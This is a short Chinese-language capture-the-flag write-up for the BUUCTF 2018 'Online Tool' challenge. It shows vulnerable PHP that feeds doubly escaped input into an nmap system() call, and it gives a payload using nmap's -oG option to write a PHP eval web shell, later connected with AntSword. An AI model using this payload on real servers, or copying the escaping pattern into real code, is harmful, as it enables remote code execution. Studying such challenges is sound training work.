[BUUCTF 2018]Online Tool

Posted 2021-05-23 H3h3QAQ

[BUUCTF 2018]Online Tool

打开就是php代码

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

= = 对于我这种php菜鸡 就需要一个一个去查函数的意思

escapeshellarg()&escapeshellcmd()没见过 Baidu一下

传入的参数是：172.17.0.2’ -v -d a=1
经过escapeshellarg处理后变成了’172.17.0.2’’’ -v -d a=1’，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成’172.17.0.2’\\’’ -v -d a=1’，这是因为escapeshellcmd对\\以及最后那个不配对儿的引号进行了转义：http://php.net/manual/zh/function.escapeshellcmd.php
最后执行的命令是curl ‘172.17.0.2’\\’’ -v -d a=1’，由于中间的\\被解释为\\而不再是转义字符，所以后面的’没有被转义，与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\\ -v -d a=1’，即向172.17.0.2\\发起请求，POST 数据为a=1’。

echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 存在执行命令 然后还有传参

大概意思为，输入ip来进行扫描 然后通过以上的两个函数转义

然后是单引号接受参数

所以我们可以逃脱单引号

但escapeshellcmd会对这些特殊符号前面加上\\来转义

在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件

构造payload：

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

巨长的一串是文件夹名

然后蚁剑链接拿到flag